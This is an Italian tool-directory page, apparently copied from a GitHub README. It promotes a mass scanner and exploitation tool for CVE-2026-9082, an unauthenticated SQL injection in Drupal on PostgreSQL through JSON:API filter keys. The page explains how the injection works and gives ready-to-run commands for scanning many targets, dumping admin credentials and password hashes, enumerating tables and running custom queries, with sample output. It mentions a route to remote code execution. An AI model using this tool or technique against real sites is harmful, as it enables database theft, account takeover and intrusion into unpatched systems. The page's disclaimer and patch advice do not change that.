Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
drupal-jsonapi-sqli-scanner — Scanner: CVE-2026-9082 SQLi PostgreSQL in Drupal tramite JSON:API — scanner Python per SQLi non autenticata che porta a RCE (CISA KEV) | Kitploit
Strumenti/GitHubGitHub/ridhinva/drupal-jsonapi-sqli-scanner
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta InformazioniPenetration TestingRed TeamingSicurezza dei Database
GitHub
ridhinva/drupal-jsonapi-sqli-scanner

drupal-jsonapi-sqli-scanner

Scanner: CVE-2026-9082 SQLi PostgreSQL in Drupal tramite JSON:API — scanner Python per SQLi non autenticata che porta a RCE (CISA KEV)

Vedi Repository
2161 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-9082 Critical CISA KEV Affected Versions License

CVE-2026-9082 — Iniezione SQL in Drupal PostgreSQL

Scanner di massa e strumento di exploitation

Iniezione SQL non autenticata nel Drupal Core (PostgreSQL)
Iniezione di chiavi di array nei filtri JSON:API tramite abuso dei nomi dei placeholder PDO


Panoramica

CVE-2026-9082 è una vulnerabilità di iniezione SQL altamente critica nel Drupal Core che colpisce tutti i siti basati su PostgreSQL che eseguono Drupal dalla 8.0 alla 11.3.9. Aggiunta al catalogo CISA Known Exploited Vulnerabilities (KEV) il 2026-05-22 — attivamente sfruttata in natura.

Impatto

GravitàCVSSAutenticazione richiestaVettore di attacco
Critica9.8+NessunaHTTP (JSON:API)
  • Esfiltrazione dei dati — estrae database, utenti, hash delle password
  • Escalation dei privilegi — crea account amministratore, modifica i contenuti
  • Esecuzione remota di codice — in alcune configurazioni tramite pg_exec() o COPY ... PROGRAM

Versioni interessate

StatoVersioni
❌ VulnerabileDrupal 8.0.0 → 11.3.9 (backend PostgreSQL)
✅ Corretta11.3.10, 11.2.12, 10.6.9, 10.5.10

Come funziona

La vulnerabilità risiede in core/modules/pgsql/src/EntityQuery/Condition.php. Il metodo translateCondition() utilizza chiavi di array controllate dall'utente provenienti dai parametri dei filtri JSON:API per costruire i nomi dei placeholder PDO. PDO riconosce come nomi di placeholder solo [a-zA-Z0-9_], quindi qualsiasi suffisso dopo ) diventa SQL letterale iniettato nella query.

root@kitploit:~
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

Funzionalità

  • ✅ Scanner di massa — scansiona centinaia di target contemporaneamente
  • ✅ Modalità target singolo — verifica singoli siti Drupal
  • ✅ Rilevamento basato sul tempo — conferma di SQLi cieca tramite pg_sleep()
  • ✅ Rilevamento basato su booleani — confronto del numero di righe
  • ✅ Estrazione della versione — identifica la versione di PostgreSQL
  • ✅ Informazioni sul database — estrae utente corrente e nome del database
  • ✅ Dump delle credenziali admin — username, email, hash della password (uid=1)
  • ✅ Elenco delle tabelle — enumera tutte le tabelle pubbliche
  • ✅ Query SQL personalizzate — esegui qualsiasi query di estrazione
  • ✅ Supporto proxy — instrada il traffico tramite Burp Suite o simili
  • ✅ Output su file — salva i risultati della scansione di massa
  • ✅ Output colorato sul terminale — risultati facili da leggere

Installazione

Prerequisiti

  • Python 3.8+
  • pip (gestore dei pacchetti Python)

Installazione delle dipendenze

root@kitploit:~
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

Tutto qui! Una sola dipendenza — requests.


Utilizzo

🕵️ Verifica di un singolo target

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 Scansione di massa di più target

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt

Formato di targets.txt:

root@kitploit:~
https://target1.com
target2.com
192.168.1.100

🔓 Estrazione della versione di PostgreSQL

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ Estrazione delle informazioni sul database

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 Dump delle credenziali admin (uid=1)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 Elenco di tutte le tabelle

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 Query SQL personalizzata

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

Salva i risultati su file

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

Utilizza un proxy (Burp Suite)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

Personalizza i tempi

root@kitploit:~
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

Riferimento dei comandi

FlagDescrizione
-u, --urlURL del target singolo
-f, --fileFile contenente i target (uno per riga)
-o, --outputSalva i risultati della scansione su file
--checkVerifica se il target è vulnerabile
--versionEstrae la versione di PostgreSQL
--dbinfoEstrae utente del DB e nome del database
--adminEstrae le credenziali admin di Drupal (uid=1)
--tablesElenca tutte le tabelle del database
--queryQuery SQL di estrazione personalizzata
--threadsThread per la scansione di massa (default: 20)
--timeoutTimeout delle richieste HTTP (default: 30s)
--delayRitardo di pg_sleep per il rilevamento (default: 5s)
--no-ssl-verifySalta la verifica del certificato TLS
--proxyProxy HTTP (es., http://127.0.0.1:8080)

Esempio di output

Target vulnerabile

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

Dump delle credenziali admin

root@kitploit:~
[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

Riferimenti

SorgenteLink
Advisory DrupalSA-CORE-2026-004
Catalogo CISA KEVCVE-2026-9082
Commit della patchea9524d9
Voce NVDCVE-2026-9082
ScopritoreMichael Maturi

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati, scopi educativi e ricerca etica.

L'accesso non autorizzato ai sistemi informatici è illegale. Gli autori declinano ogni responsabilità e non sono responsabili di qualsiasi uso improprio o danno causato da questo programma.


Autore

Ridhin V A (@ridhinva) — Bug bounty hunter e ricercatore di sicurezza

Realizzato perché la CISA KEV ha segnalato che la vulnerabilità è sfruttata in natura. Applicate la patch ai vostri siti Drupal.

Scarica lo strumento